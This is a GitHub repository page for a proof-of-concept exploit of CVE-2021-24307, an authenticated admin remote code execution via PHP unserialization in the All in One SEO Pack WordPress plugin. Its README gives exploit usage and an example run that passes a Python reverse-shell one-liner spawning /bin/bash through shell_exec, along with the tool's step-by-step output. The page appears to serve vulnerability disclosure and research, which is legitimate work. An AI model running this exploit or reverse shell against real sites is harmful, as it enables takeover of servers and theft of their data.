Skip to content

darkpills/CVE-2021-24307-all-in-one-seo-pack-admin-rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Admin PHP unserialization RCE in All in one SEO pack (CVE-2021-24307)

Simple PoC of an admin authenticated RCE in AISEO <= 4.1.0.1 provided as an example.

Full write-up here: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

Usage:

php exploit.php url login password php_command arguments [proxy]

Example:

└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 authenticated admin RCE --
-- Exploit by Vincent MICHEL (@darkpills) --

[+] Authenticating to wordpress http://wordpress/
[+] Getting WP REST API nonce
[+] Nonce found: 6aeb9ddf05
[+] Generating POST payload to execute command: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] Uploading ini file with import settings
[+] Done! Check the result somewhere (blind command execution)

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages